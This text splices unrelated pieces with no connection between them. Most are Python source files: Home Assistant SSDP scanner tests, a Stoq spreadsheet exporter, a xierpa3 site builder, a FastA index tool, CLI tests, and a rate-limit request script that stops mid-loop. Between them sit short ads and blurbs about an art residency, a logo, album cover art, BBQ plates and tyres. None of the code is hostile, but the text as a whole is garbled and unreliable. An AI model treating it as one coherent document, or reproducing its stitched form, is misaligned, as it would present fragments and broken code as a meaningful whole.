<root>
<device>
<deviceType>Paulus</deviceType>
</device>
</root>
""",
)
scanner = ssdp.Scanner(
hass,
{
"mock-domain": [
{
ssdp.ATTR_UPNP_DEVICE_TYPE: "Paulus",
ssdp.ATTR_UPNP_MANUFACTURER: "Paulus",
}
]
},
)
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert not mock_init.mock_calls
async def test_scan_not_all_match(hass, aioclient_mock):
"""Test match fails if some specified attribute values differ."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
<root>
<device>
<deviceType>Paulus</deviceType>
<manufacturer>Paulus</manufacturer>
</device>
</root>
""",
)
scanner = ssdp.Scanner(
hass,
{
"mock-domain": [
{
ssdp.ATTR_UPNP_DEVICE_TYPE: "Paulus",
ssdp.ATTR_UPNP_MANUFACTURER: "Not-Paulus",
}
]
},
)
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert not mock_init.mock_calls
@pytest.mark.parametrize("exc", [asyncio.TimeoutError, aiohttp.ClientError])
async def test_scan_description_fetch_fail(hass, aioclient_mock, exc):
"""Test failing to fetch description."""
aioclient_mock.get("http://1.1.1.1", exc=exc)
scanner = ssdp.Scanner(hass, {})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
):
await scanner.async_scan(None)
async def test_scan_description_parse_fail(hass, aioclient_mock):
"""Test invalid XML."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
<root>INVALIDXML
""",
)
scanner = ssdp.Scanner(hass, {})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
):
await scanner.async_scan(None)
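# Usage mirrored by the tests above (a sketch, not necessarily a public API):
#   scanner = ssdp.Scanner(hass, {"my-domain": [{"st": "some-st"}]})
#   await scanner.async_scan(None)  # starts config flows for matching devices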
|
We have a Vandercook press that needs a motivated printmaker with a positive attitude who wants to start a creative printmaking program.
There are opportunities for exhibitions, workshops, classes, and whatever you are willing to create and execute; get creative: Thomasville Center for the Arts is dedicated to elevating artists to their fullest potential. Please contact Darlene Taylor for more information about this Internship/Artist Residency, which begins in early August. |
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2008-2012 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <[email protected]>
##
"""Spreedsheet Exporter Dialog"""
import gio
import gtk
from stoqlib.api import api
from stoqlib.exporters.xlsexporter import XLSExporter
from stoqlib.lib.message import yesno
from stoqlib.lib.translation import stoqlib_gettext
_ = stoqlib_gettext
class SpreadSheetExporter:
"""A dialog to export data to a spreadsheet
"""
    title = _('Export to Spreadsheet')
def export(self, object_list, name, filename_prefix, data=None):
xls = XLSExporter(name)
xls.add_from_object_list(object_list, data)
temporary = xls.save(filename_prefix)
self.export_temporary(temporary)
def export_temporary(self, temporary):
mime_type = 'application/vnd.ms-excel'
app_info = gio.app_info_get_default_for_type(mime_type, False)
if app_info:
action = api.user_settings.get('spreadsheet-action')
if action is None:
action = 'open'
else:
action = 'save'
if action == 'ask':
action = self._ask(app_info)
if action == 'open':
temporary.close()
self._open_application(mime_type, temporary.name)
elif action == 'save':
self._save(temporary)
def _ask(self, app_info):
# FIXME: What if the user presses esc? Esc will return False
# and open action will be executed. Esc should cancel the action
if yesno(_("A spreadsheet has been created, "
"what do you want to do with it?"),
gtk.RESPONSE_NO,
_('Save it to disk'),
_("Open with %s") % (app_info.get_name())):
return 'save'
else:
return 'open'
def _open_application(self, mime_type, filename):
app_info = gio.app_info_get_default_for_type(mime_type, False)
gfile = gio.File(path=filename)
app_info.launch([gfile])
def _save(self, temp):
chooser = gtk.FileChooserDialog(
_("Export Spreadsheet..."), None,
gtk.FILE_CHOOSER_ACTION_SAVE,
(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
chooser.set_do_overwrite_confirmation(True)
xls_filter = gtk.FileFilter()
xls_filter.set_name(_('Excel Files'))
xls_filter.add_pattern('*.xls')
chooser.add_filter(xls_filter)
response = chooser.run()
filename = None
if response != gtk.RESPONSE_OK:
chooser.destroy()
return
filename = chooser.get_filename()
ext = '.xls'
chooser.destroy()
if not filename.endswith(ext):
filename += ext
        # Open in binary mode so Windows doesn't replace '\n' with '\r\n'
open(filename, 'wb').write(temp.read())
temp.close()
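# Example usage (a minimal sketch; `results` is an assumed ObjectList of
# domain objects from a Stoq search dialog):
#   exporter = SpreadSheetExporter()
#   exporter.export(object_list=results, name='products',
#                   filename_prefix='products')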
|
Have a book-related company? Do you make bookmarking software? This book logo icon may be the perfect fit for you! |
#!/usr/bin/env python3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from io import StringIO
import os
import sys
import unittest
import tempfile
from generate_framework_tests_and_coverage import generate_framework_tests_and_coverage
from models import TestPartitionDescription
from models import TestPlatform
TEST_DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"test_data")
class GenerateFrameworkTestsAndCoverageTest(unittest.TestCase):
def test_coverage(self):
actions_filename = os.path.join(TEST_DATA_DIR, "test_actions.csv")
coverage_filename = os.path.join(TEST_DATA_DIR,
"test_unprocessed_coverage.csv")
custom_partitions = [
TestPartitionDescription(
action_name_prefixes={"state_change_b"},
browsertest_dir=TEST_DATA_DIR,
test_file_prefix="tests_change_b",
test_fixture="TwoClientWebAppsIntegrationSyncTest")
]
default_partition = TestPartitionDescription(
action_name_prefixes=set(),
browsertest_dir=TEST_DATA_DIR,
test_file_prefix="tests_default",
test_fixture="WebAppIntegrationBrowserTest")
with open(actions_filename) as actions_file, \
open(coverage_filename) as coverage_file, \
tempfile.TemporaryDirectory() as output_dir:
capturedOutput = StringIO()
sys.stdout = capturedOutput
generate_framework_tests_and_coverage(actions_file, coverage_file,
custom_partitions,
default_partition,
output_dir, None)
# The framework uses stdout to inform the developer of tests that
# need to be added or removed. Since there should be no tests
# changes required, nothing should be printed to stdout.
      self.assertFalse(capturedOutput.getvalue())
sys.stdout = sys.__stdout__
for platform in TestPlatform:
file_title = "coverage" + platform.suffix + ".tsv"
gen_coverage_filename = os.path.join(output_dir, file_title)
expected_coverage_filename = os.path.join(
TEST_DATA_DIR, "expected_" + file_title)
with open(gen_coverage_filename) as coverage_file, \
open(expected_coverage_filename) as expected_file:
self.assertListEqual(list(coverage_file.readlines()),
list(expected_file.readlines()))
if __name__ == '__main__':
unittest.main()
|
On location at one of the airports, we got the idea for this cover art. It had all the elements we wanted, and capturing the feel we envisioned took only a few hours of waiting. Waiting for just the right moment.
A wide range of airplanes took off that day, and as we were wrapping up we decided to take one last picture - luck was on our side, as it was the night flight to Beijing. Big plane, happy photographer; happy photographer equals great artwork!
The needed elements were then composed together and retouched, and the end result was a stunning artwork with color and a powerful message.
For this release we also prepared full social media coverage, with Facebook banners, Instagram photos and a video for YouTube. |
# -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# make.py
#
# Demo site for the simple "BasicWebsite" example.
# Each of the builders takes the information from the theme to build its
# own type of file.
#
import webbrowser
from xierpa3.attributes import Color, Em, Perc
from xierpa3.components import Theme, Page, Column, Logo, Menu, MobileNavigation, Container, Article, \
ArticleSideBar, Footer, FeaturedByImage, FeaturedByDiapText, FeaturedByText, FeaturedByImageList, \
ArticlesList, PosterHead
from xierpa3.descriptors.blueprint import BluePrint
from xierpa3.descriptors.media import Media
from xierpa3.toolbox.transformer import TX
from xierpa3.adapters.textilefileadapter import TextileFileAdapter
# Load @fontface fonts for this example from www.webtype.com
BODYFAMILY = '"Benton Sans RE", Verdana, sans'
HEADFAMILY = '"Hermes FB Semibold", Impact, Verdana, sans'
class Top(Container):
BLUEPRINT = BluePrint(MobileNavigation.BLUEPRINT,
# Layout alternatives
backgroundColor=Color('#fff'), doc_backgroundColor='Top background color.',
)
class Navigation(Column):
def buildBlock(self, b):
b.div(class_='navigation', marginbottom=Em(2), paddingright=Em(1), backgroundcolor=Color('#EEE'))
for article in self.adapter.getRankedArticles():
if article.title:
b.a(href='/article-%s' % article.id, fontsize=Em(0.8), marginright=Em(1), color=Color('#888'))
b.text(article.title)
b._a()
else:
b.text('No title for article "%s"' % article.id)
b.br()
b._div()
class DbdWebsite(Theme):
u"""The *DbdWebsite* generates the DoingByDesign website from a given adapter with all navigation
and content in place. The styling is not different from default (no additional styling added,
except what is already defined the @component.BLUEPRINT@."""
C = Theme.C
TITLE = u'Doing by Design' # Use as title of window.
XIERPA3_DEMOFONTS = "//cloud.webtype.com/css/34d3e5fe-7dee-4122-9e87-ea5ee4a90a05.css"
URL_FONTS = [
        # Note that this package contains a set of the latest featured fonts, and may change in the future.
# If using the font in this package, safest is to refer to the functional constant names below,
# instead of making a direct reference to the family name.
# Of course, taking your own account at //www.webtype.com is even better :)
XIERPA3_DEMOFONTS, # Webtype @fontface fonts, to be used for localhost demo purposes.
]
# The single column is filled by the self.adapter article query result and standard navigation.
    # The default b.adapter takes the articles from the DbD site.
def baseStyle(self):
u"""Answer the single basis style that will be defined as overall CSS, before
specific block definitions start."""
s = Article.BLUEPRINT
root = self.newStyle() # Create root style
root.addStyle('body', fontfamily=BODYFAMILY, fontsize=s.fontSize,
backgroundcolor=s.pageBackgroundColor, lineheight=s.lineHeight)
        # Add the type selector styles to the root style.
        root.addStyle('h1, h2, h3, h4, h5, p.lead', fontfamily=HEADFAMILY)
        root.addStyle('h6', fontfamily=BODYFAMILY)
        root.addStyle('b', fontweight=self.C.BOLD)
        root.addStyle('a', color=Color('#CECECE'))
return root
def getSiteAdapter(self):
u"""Answer the adapter for this site, including all articles of the DbD site."""
from xierpa3.sites import doingbydesign
# Root path where to find the article Simples wiki file for this example page.
articleRoot = TX.module2Path(doingbydesign) + '/files/articles/'
return TextileFileAdapter(articleRoot) # Preferred adapter class for articles in this site.
def baseComponents(self):
u"""Create a theme site with just one single template home page. Answer a list
of page instances that are used as templates for this site."""
# Create an instance (=object) of components to be placed on the page.
# Import current example site, as anchor for the article files.
adapter = self.getSiteAdapter()
logo = Logo()
menu = Menu()
navigation = Navigation()
article = Article(showPoster=False) # No poster inside the article. We use the PosterHead component.
articleSideBar = ArticleSideBar(showChapterNavigation=True)
articlesList = ArticlesList()
posterhead = PosterHead() # Wordpress-like big picture from article.poster link.
featuredByImage = FeaturedByImage()
featuredByDiapText = FeaturedByDiapText()
featuredByText = FeaturedByText()
featuredByImageList = FeaturedByImageList()
# Containers for pages
top = Top(components=(logo, menu), media=Media(max=self.C.M_MOBILE_MAX, display=self.C.NONE))
homeContainer = Container(components=(featuredByDiapText, featuredByImage, featuredByText,
featuredByImageList))
articleContainer = Container(components=(posterhead, article, articleSideBar))
articlesListContainer = Container(articlesList,)
footer = Footer()
# Create an instance (=object) of the page, containing the navigation components.
# The class is also the page name in the url.
homePage = Page(class_=self.C.TEMPLATE_INDEX, components=(top, homeContainer, footer), adapter=adapter,
title=self.TITLE, fonts=self.URL_FONTS)
articlePage = Page(class_=self.C.TEMPLATE_ARTICLE, components=(top, articleContainer, footer), adapter=adapter,
title=self.TITLE, fonts=self.URL_FONTS)
articlesPage = Page(class_=self.C.TEMPLATE_ARTICLES, components=(top, articlesListContainer, footer),
adapter=adapter, title=self.TITLE, fonts=self.URL_FONTS)
# Answer a list of types of pages for this site. In this case just one template.
return [homePage, articlePage, articlesPage]
|
"Justins Gift" True Story. . .
How Great The Love Of Wildheart!
REPOST. from 2006 Even On Bad Days Some Good Can Come.
EVER WONDER WHERE THE MAGIC OF CHRISTMAS DISAPPEARS TO ?
THE RIDE ON PAINTED HORSE!
PROSE~~~KIDS DO THE DARNDEST THINGS!!!! |
#!/usr/bin/env python2
desc="""FastA index (.fai) handler compatible with samtools faidx (http://www.htslib.org/doc/faidx.html).
.fai is extended with 4 columns storing counts for A, C, G & T for each sequence.
"""
epilog="""Author: [email protected]
Bratislava, 15/06/2016
"""
import os, sys
from datetime import datetime
def symlink(file1, file2):
"""Create symbolic link taking care of real path."""
if not os.path.isfile(file2):
# check if need for absolute path
file1abs = os.path.join(os.path.realpath(os.path.curdir), file1)
if os.path.isfile(file1abs):
os.symlink(file1abs, file2)
# otherwise create symbolic link without full path
else:
os.symlink(file1, file2)
class FastaIndex(object):
"""Facilitate Fasta index (.fai) operations compatible
with samtools faidx (http://www.htslib.org/doc/faidx.html).
"""
def __init__(self, handle, verbose=0, log=sys.stderr):
""" """
ext = ".fai"
self.verbose = verbose
self.log = log.write
self.genomeSize = 0
self.whitespaces_in_headers = False
# guess handle
if type(handle) is str and os.path.isfile(handle):
handle = open(handle)
if type(handle) is file:
if handle.name.endswith(('.gz','.bz')):
raise Exception("Compressed files are currently not supported!")
self.handle = handle
else:
sys.stderr.write("[ERROR] Couldn't guess handle for %s\n"%str(handle))
sys.exit(1)
self.fasta = self.handle.name
self.faidx = self.fasta + ext
# check if fasta is symlink
if not os.path.isfile(self.faidx) and os.path.islink(self.fasta):
_fasta = os.path.realpath(self.fasta)
_faidx = _fasta+ext
# symlink faidx if faidx exists and linked fasta is older than its faidx
if os.path.isfile(_faidx) and os.stat(_fasta).st_mtime < os.stat(_faidx).st_mtime:
symlink(_faidx, self.faidx)
# create new index if no .fai, .fai loading failed or .fai younger than .fasta
if not os.path.isfile(self.faidx) or not self._load_fai() or \
os.stat(self.fasta).st_mtime > os.stat(self.faidx).st_mtime:
self._generate_index()
# links
self.get = self.get_fasta
# init storage
self.base2rc= {"A": "T", "T": "A", "C": "G", "G": "C",
"a": "t", "t": "a", "c": "g", "g": "c",
"N": "N", "n": "n"}
# basecounts
self.basecounts = map(sum, zip(*[stats[-4:] for stats in self.id2stats.itervalues()]))
self.Ns = self.genomeSize - sum(self.basecounts)
def __process_seqentry(self, out, header, seq, offset, pi):
"""Write stats to file and report any issues"""
if header:
# get seqid and sequence stats
seqid = self.get_id(header)
# catch empty headers
if not seqid:
self.log("[WARNING] No header at line: %s\n"%", ".join(map(str, (pi,seqid,header))))
return
stats = self.get_stats(header, seq, offset)
# warn about empty sequences
if not stats[0]:
self.log("[WARNING] No sequence for: %s at line: %s\n"%(seqid, pi))
# catch duplicates
if seqid in self.id2stats:
self.log("[WARNING] Duplicated sequence ID: %s at line: %s\n"%(seqid, pi))
self.id2stats[seqid] = stats
out.write("%s\t%s\n"%(seqid, "\t".join(map(str, stats))))
def _generate_index(self):
"""Return fasta records"""
if self.verbose:
self.log("Generating FastA index...\n")
header, seq = "", []
offset = pi = 0
self.id2stats = {}
with open(self.faidx, 'w') as out:
for i, l in enumerate(iter(self.handle.readline, ''), 1):
if l.startswith(">"):
self.__process_seqentry(out, header, seq, offset, pi)
# mark that there is whitespace in headers
if len(l[:-1].split())>1:
self.whitespaces_in_headers = True
header = l
offset = self.handle.tell()
seq = []
pi = i
else:
seq.append(l)
# process last entry
self.__process_seqentry(out, header, seq, offset, pi)
def _load_fai(self):
"""Load stats from faidx file.
Return False if .fai is wrongly formatted.
"""
self.id2stats = {}
for l in open(self.faidx):
ldata = l[:-1].split('\t')
if len(ldata)<9:
self.whitespaces_in_headers = False
return
rid = ldata[0]
stats = map(int, ldata[1:])
self.id2stats[rid] = stats
# update genomeSize
self.genomeSize += stats[0]
if len(rid.split())>1:
self.whitespaces_in_headers = True
return True
def __len__(self):
"""How many records are there?"""
return len(self.id2stats)
def __iter__(self):
"""Iterate over the keys."""
for seqid in self.id2stats:
yield seqid
def __getitem__(self, key, start=None, stop=None, name=None, seqonly=False):
"""x.__getitem__(y) <==> x[y]"""
if key not in self.id2stats:
#raise KeyError
sys.stderr.write("[Warning] No such entry: %s\n"%key)
return ""
# get offset info
size, offset, linebases, linebytes = self.id2stats[key][:4]
# compute bytes to fetch
linediff = linebytes - linebases
seqid = key
# get sequence slice
if start and stop:
reverse_complement = 0
if start<1:
start = 1
seqid = "%s:%s-%s"%(key, start, stop)
if start>stop:
reverse_complement = 1
start, stop = stop, start
if stop > size:
stop = size
# 1-base, inclusive end
start -= 1
# get bytesize and update offset
offset += start / linebases * linebytes + start % linebases
realsize = stop-start
bytesize = realsize / linebases * linebytes + realsize % linebases
# read sequence slice
self.handle.seek(offset)
seq = self.handle.read(bytesize).replace('\n', '')
if reverse_complement:
seq = self.get_reverse_complement(seq)
if seqonly:
return seq
# format lines
seq = '\n'.join(seq[i:i+linebases] for i in range(0, len(seq), linebases))+'\n'
# load whole sequence record
else:
# get bytesize
bytesize = size / linebases * linebytes + size % linebases
## add line diff for last line only for multiline fasta if last line is not complete
if size / linebytes and size % linebases:
bytesize += linediff
# read entire sequence
self.handle.seek(offset)
seq = self.handle.read(bytesize)
if seqonly:
return "".join(seq.split('\n'))
# update name
if not name:
name = seqid
record = ">%s\n%s"%(name, seq)
return record
def get_reverse_complement(self, seq):
"""Return reverse complement"""
rc = []
for seqsegment in seq.split():
for b in seqsegment:
if b in self.base2rc:
rc.append(self.base2rc[b])
else:
rc.append(b)
return "".join(reversed(rc))
def get_sequence(self, contig, reverse=False):
"""Return sequence of given contig"""
seq = self.__getitem__(contig, seqonly=True)
if reverse:
return self.get_reverse_complement(seq)
return seq
def get_fasta(self, region="", contig="", start=None, stop=None, name=None):
"""Return FastA slice"""
if region:
if ':' in region:
#if '-' in region:
try:
contig, startstop = region.split(':')
start, stop = map(int, startstop.split('-'))
except Exception:
raise Exception("Malformed region definition: %s, while expected contig:start-stop"%region)
else:
contig = region
elif not contig:
self.log("Provide region or contig!\n")
return
# get record
record = self.__getitem__(contig, start, stop, name)
return record
def get_id(self, header):
"""Return seqid from header"""
# catch empty headers
if len(header.strip())<2:
return
return header[1:].split()[0]
def get_stats(self, header, seq, offset):
"""Return seq length, offset, linebases, linebyts and number of
A, C, G and T in each sequence.
Compatible with samtools faidx (http://www.htslib.org/doc/faidx.html).
"""
errors = 0
# get bases & bytes in line, ignoring last line
if len(seq)>1:
linebases = set(len(s.strip()) for s in seq[:-1])
linebytes = set(len(s) for s in seq[:-1])
if len(linebases)>1:
self.log("[WARNING] Uneven line lengths in %s: %s\n"%(header, ",".join(map(str, linebases))))
linebases, linebytes = max(linebases), max(linebytes)
elif len(seq)==1:
linebases, linebytes = len(seq[0].strip()), len(seq[0])
# handle empty sequences https://github.com/lpryszcz/redundans/issues/13
else:
linebases, linebytes = 60, 61 #len(seq[0].strip()), len(seq[0])
seq = "".join(s.strip() for s in seq)
seqlen = len(seq)
self.genomeSize += seqlen
# count ACGT
        # Count only the bases tracked in the dict; anything else is skipped.
        bases = {'A': 0, 'C': 0, 'G': 0, 'T': 0, 'N': 0}
        for b in seq.upper():
            if b in bases:
                bases[b] += 1
return (seqlen, offset, linebases, linebytes, \
bases['A'], bases['C'], bases['G'], bases['T'])
def sort(self, reverse=1, minLength=0, genomeFrac=0):
"""Return list of contigs sorted by descending size (reverse=1).
The list of returned contigs can be limited by:
- minLength - return contigs longer than bases [0]
- genomeFrac - return the longest contigs until genomeFrac is reached [all]
"""
# get all contigs
contigs = self.id2stats.keys()
contigi = len(contigs)
# filter by contig length
if minLength:
contigs = filter(lambda x: self.id2stats[x][0]>=minLength, self.id2stats)
# sort by descending size
sorted_contigs = sorted(contigs, key=lambda x: self.id2stats[x][0], reverse=reverse)
# filter longest contigs by genome fraction
if genomeFrac:
totsize = 0
for contigi, c in enumerate(sorted_contigs, 1):
totsize += self.id2stats[c][0]
if totsize >= genomeFrac*self.genomeSize:
break
return sorted_contigs[:contigi]
def get_N_and_L(self, genomeFrac=0.5, return_L=False, genomeSize=None):
"""Return N50 (and L50 if return_L) of given FastA.
- genomeFrac - calculate N (and L) for this fraction of genome [0.5 for N50 & L50]
- return NL - return N50 (contig size) and L50 (number of contigs) [False]
- genomeSize - if provided, it will use this size of the genome
instead of size of give assembly
"""
if not genomeSize:
genomeSize = self.genomeSize
# parse contigs by descending size
totsize = 0
for i, x in enumerate(sorted(self.id2stats.itervalues(), reverse=True), 1):
size = x[0]
totsize += size
if totsize >= genomeFrac*genomeSize:
break
# return N & L
if return_L:
return size, i
# return just N
return size
def N90(self):
"""Return N90"""
return self.get_N_and_L(0.9)
def L90(self):
"""Return N90"""
return self.get_N_and_L(0.9, return_L=True)[1]
def N50(self):
"""Return N90"""
return self.get_N_and_L()
def L50(self):
"""Return N90"""
return self.get_N_and_L(return_L=True)[1]
def GC(self):
"""Return GC and number of Ns"""
# catch errors ie. empty files
#if len(basecounts) != 4:
# return "%s\t[ERROR] Couldn't read file content\n"%handle.name
(A, C, G, T) = self.basecounts
GC = 100.0*(G + C) / sum(self.basecounts)
return GC
def stats(self):
"""Return FastA statistics aka fasta_stats"""
if not self.id2stats:
return "[WARNING] No entries found!\n"
longest = max(stats[0] for stats in self.id2stats.itervalues())
lengths1000 = [x[0] for x in self.id2stats.itervalues() if x[0]>=1000]
contigs1000 = len(lengths1000)
_line = '%s\t%s\t%s\t%.3f\t%s\t%s\t%s\t%s\t%s\t%s\n'
line = _line % (self.fasta, len(self), self.genomeSize, self.GC(), contigs1000, sum(lengths1000),
self.N50(), self.N90(), self.Ns, longest)
return line
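# Example usage (a minimal sketch; 'genome.fa' is a placeholder path):
#   faidx = FastaIndex('genome.fa')       # (re)builds genome.fa.fai if needed
#   print faidx.N50(), faidx.L50()        # assembly contiguity stats
#   print faidx.get_fasta('chr1:1-100')   # FastA slice, samtools-faidx style
#   print faidx.get_fasta('chr1:100-1')   # reverse complement of the slice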
def main():
import argparse
usage = "%(prog)s -i " #usage=usage,
parser = argparse.ArgumentParser(description=desc, epilog=epilog, \
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', action='version', version='0.11c')
parser.add_argument("-v", "--verbose", default=False, action="store_true",
help="verbose")
parser.add_argument("-i", "--fasta", type=file,
help="FASTA file(s)")
parser.add_argument("-o", "--out", default=sys.stdout, type=argparse.FileType('w'),
help="output stream [stdout]")
parser.add_argument("-r", "--regions", nargs='*', default=[],
help="contig(s) or contig region(s) to output (returns reverse complement if end larger than start)")
parser.add_argument("-N", default=0, type=int,
help="calculate NXX and exit ie N50")
parser.add_argument("-L", default=0, type=int,
help="calculate LXX and exit ie L50")
parser.add_argument("-S", "--stats", default=False, action="store_true",
help="return FastA stats aka fasta_stats")
o = parser.parse_args()
# print help if no parameters
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if o.verbose:
sys.stderr.write("Options: %s\n"%str(o))
# init faidx
faidx = FastaIndex(o.fasta, o.verbose)
# report N & L
if o.N:
o.out.write("%s\n"%faidx.get_N_and_L(o.N/100.))
if o.L:
o.out.write("%s\n"%faidx.get_N_and_L(o.L/100., return_L=True)[1])
# fasta_stats
if o.stats:
o.out.write(faidx.stats())
# report regions
for region in o.regions:
o.out.write(faidx.get_fasta(region))
if __name__=='__main__':
t0 = datetime.now()
try:
main()
except KeyboardInterrupt:
sys.stderr.write("\nCtrl-C pressed! \n")
except IOError as e:
sys.stderr.write("I/O error({0}): {1}\n".format(e.errno, e.strerror))
#[Errno 95] Operation not supported
    except OSError as e:
        sys.stderr.write("OS error({0}): {1}\n".format(e.errno, e.strerror))
dt = datetime.now()-t0
sys.stderr.write("#Time elapsed: %s\n"%dt)
|
Find great deals on eBay for stainless steel bbq plate. Shop with confidence.
Topnotch™ barbeque plates and baking dishes are manufactured from a special grade of heat transferring stainless steel. It is the composition of the material which gives the Topnotch™ Stainless Steel Hot Plates the special ability to transfer and retain heat as well as being corrosion resistant.
The Matador Stainless Steel BBQ Scraper is made from quality, long lasting, easy-to-clean stainless steel with a robust, soft grip rubber coated handle. The Matador BBQ Grillsmart Hotplate and Grill Cleaner has been designed to make cleaning the bars of your grill and the surface of your hotplates as quick, easy and effective as possible.
Amazon: stainless steel heat plates. SHINESTAR Grill Parts, 3-Pack Universal BBQ Heat Shield Extend from 11 3/4" to 21", Adjustable Grill Heat Tent, Gas Grill Replacement Parts for Char-Broil, Brinkmann, Kenmore, Backyard Grill Heat Plate. By SHINESTAR. $16.99 Prime.
We've got a massive range Stainless Steel, Satin Enamal & Cast Iron BBQ plates for your BBQ. View our range & replace or upgrade today!
BBQ Grills/Hotplates: Cast Iron BBQ Grill - 4 burner Cast Iron BBQ Grill replacement, $59.95. Multi-purpose Stainless Steel BBQ Spit Grill Rack for use with BBQ, spit or oven, or as a cooling rack, 530mm x 325mm, $30.00. In Stock. M929.
Topnotch™ barbeque plates are manufactured from a special grade of heat transferring stainless steel. It is the composition of the material which gives the Topnotch™ Stainless Steel Hot Plates the special ability to transfer and retain heat as well as being corrosion resistant.
Weber 3-burner Propane Gas Bbq Grill Stainless Steel Builtin Thermometer Outdoor $1,006.99. Weber Grills 13 Piece Stainless Steel Flavor Bars Heat Plates 1000 Model 93801 $94.99. 3/8" Stainless Charcoal Grate For Weber Go Anywhere Grill /custom For Richknyc $100.00.
Product Description. Upgrade or replace your existing premium hotplates with these top of the range stainless steel hotplates from Gasmate. Made from premium stainless steel, these hotplates distribute heat better than any other hotplate material, are the easiest to clean and maintain, and will outlast anything else on the market.
Bbq Grill Heat Plates Weber Stainless Steel Flavorizer Bars Bcp65902-7535 Oem $124.98. Weber State University Ladies Stainless Steel And Gold Tone Watch $126.50. Weber Grill Tools Plated-steel Hinged Cooking Grate 22" & 18" Lot X8 $149.99.
This stainless steel electric grill features removable, dishwasher-safe plates. It’s also got a “barbecue mode” that’s meant to help create the most authentic barbecue meals. The Smart Grill allows you to sear meat indoors at a high, consistent temperature, making it ideal for turkey or chicken.
STAINLESS STEEL BBQ GRILL HOT PLATE 46.5 X 38CM PREMIUM 304 GRADE Our top-of-the-line stainless steel BBQ grill and hot plate will make backyard cooking an absolute pleasure! Toss out that old cast iron grill and move up in life.
The plates should be big enough to protect the burners and vaporize enough meat drippings. Check your grill's owner's manual or simply use a tape measure to find the length, width and height of the burners. Gas grill heat plates come in stainless steel, porcelain and porcelain-coated stainless steel.
Check out our range of BBQ Spare Parts products at your local Bunnings Warehouse. Visit us today for the widest range of Accessories products. Gasmate Stainless Steel BBQ Rail Burner - 2 Pack. Order Online. Fulfilled by: Appliances Online. Delivery Available. Pick up in-store $19.89.
Making breakfast on your grill is possible with this Lynx GP Griddle Plate. The perfect outdoor kitchen accessory, this griddle is made of thick stainless steel for durability and easy cleaning and delivers consistent heat across the surface. The four feet firmly grip the grill grates so the plate will not shift while scrambling or flipping.
Gasmaster Hero Twin Hood BBQ Kitchen (New). Brand new in box. Top-of-the-range 304-grade stainless steel. This BBQ Kitchen is perfect for every occasion, from a quiet dinner for two on a weeknight to a big Saturday BBQ with friends and family. |
# coding: utf-8
"""Tests for ogre.cli"""
from __future__ import absolute_import
import random
import pytest
import ogre.cli
@pytest.fixture
def source():
"""Return a valid source."""
return random.choice(['twitter'])
# pylint: disable=redefined-outer-name
def test___main__():
"""Test python -m functionality."""
with pytest.raises(SystemExit) as excinfo:
import ogre.__main__ # pylint: disable=redefined-outer-name, unused-variable
assert excinfo.value != 0
def test_empty():
"""Test invocation with no arguments."""
with pytest.raises(SystemExit) as excinfo:
ogre.cli.main()
assert excinfo.value != 0
def test_no_credentials(source):
"""Test an invocation without API keys."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source])
assert excinfo.value != 0
def test_invalid_keys(source):
"""Test an invocation with invalid API keys."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '--keys', 'invalid'])
assert excinfo.value != 0
def test_invalid_location(source):
"""Test an invocation with an invalid location."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '-l', '0', '0', 'invalid', 'km'])
assert excinfo.value != 0
def test_invalid_interval(source):
"""Test an invocation with an invalid interval."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '-i', '0', 'invalid'])
assert excinfo.value != 0
def test_invalid_limit(source):
"""Test an invocation with an invalid limit."""
with pytest.raises(ValueError) as excinfo:
ogre.cli.main(['-s', source, '--limit', 'invalid'])
assert excinfo.value != 0
def test_invalid_log(source):
"""Test an invocation with an invalid log."""
with pytest.raises(AttributeError) as excinfo:
ogre.cli.main(['-s', source, '--log', 'invalid'])
assert excinfo.value != 0
|
P195 65r15 Tires | Kijiji in Saint John. - Buy, Sell & Save with Canada's #1 Local Classifieds.
Get an alert with the newest ads for "p195 65r15 tires" in Saint John. |
from __future__ import division
from time import sleep
import httplib2
import json
h = httplib2.Http()
url = raw_input("Please enter the uri you want to access, \n"
"If left blank the connection will be set to "
"'http://localhost:5000/rate-limited': ")
if url == '':
url = 'http://localhost:5000/rate-limited'
req_per_minute = float(raw_input("Please specify the number "
"of requests per minute: "))
interval = (60.0 / req_per_minute)
def SendRequests(url, req_per_minute):
    requests = 0
    while requests < req_per_minute:
        result = json.loads(h.request(url, 'GET')[1])
        # result = h.request(url, 'GET')[1]
        # print result
